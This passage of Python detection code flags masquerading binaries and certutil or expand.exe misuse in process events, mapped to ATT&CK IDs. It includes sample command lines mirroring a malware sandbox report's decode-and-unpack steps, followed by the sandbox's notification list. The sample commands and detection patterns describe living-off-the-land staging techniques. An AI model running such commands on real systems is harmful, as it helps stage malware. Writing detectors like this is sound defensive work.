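    findings = []
    if name in SYSTEM_TOOL_NAMES and not is_windows_path(image):
        findings.append(("T1036", f"{name} running outside a Windows directory: {image}"))
    if name == "certutil.exe":
        if re.search(r"(?i)\s-decode\s", cmd):
            findings.append(("T1140", "certutil -decode used to deobfuscate a dropped file"))
        # -urlcache is assumed here as the usual certutil download form;
        # the report only shows the fetched URL, not the flag used.
        if re.search(r"(?i)\s-urlcache\s", cmd):
            findings.append(("T1105", "certutil -urlcache used to fetch a remote file"))
    if name == "expand.exe" and TEMP_DIR.search(cmd):
        findings.append(("T1140", "expand.exe unpacking a cabinet from a temp directory"))
    return findings


def triage_all(events: list) -> dict:
    """Index -> findings, so benign events show up as empty lists."""
    return {i: triage_event(ev) for i, ev in enumerate(events)}


SAMPLE_EVENTS = [  # constructed; mirrors the report's file names only
    {"image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -decode %TEMP%\ercg345c24.txt %TEMP%\ercg345c24.cab"},
    {"image": r"C:\Windows\System32\expand.exe",
     "command_line": r"expand %TEMP%\ercg345c24.cab -F:* %TEMP%"},
    {"image": r"C:\Users\user\AppData\Local\Temp\sort.exe",
     "command_line": "sort.exe"},
    {"image": r"C:\Windows\System32\sort.exe",          # legitimate sort, no finding
     "command_line": "sort /r list.txt"},
]

if __name__ == "__main__":
    for idx, found in triage_all(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], found or "clean")
```

The path check deliberately keys on the directory rather than on a signature or hash: the report's own indicator is the location mismatch, and the binary's hash would change with every rebuild while the masquerade would not.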

Notifications

Runtime
- Although all strings were processed, some are hidden from the report in order to reduce the overall size
- Not all IP/URL string resources were checked online
- Not all created files are visible for ercg345c24.exe (PID: 3852)
- Not all file accesses are visible for certutil.exe (PID: 3128)
- Not all file accesses are visible for certutil.exe (PID: 3948)
- Not all file accesses are visible for cmd.exe (PID: 1064)
- Not all file accesses are visible for cmd.exe (PID: 3180)
- Not all file accesses are visible for ercg345c24.exe (PID: 3852)
- Not all file accesses are visible for expand.exe (PID: 2512)
- Not all file accesses are visible for sort.exe (PID: 2260)
- Not all sources for indicator ID "api-4" are available in the report
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "binary-0" are available in the report
- Not all sources for indicator ID "binary-1" are available in the report
- Not all sources for indicator ID "binary-16" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report
- Not all sources for indicator ID "string-24" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)
- Some low-level data is hidden, as this is only a slim report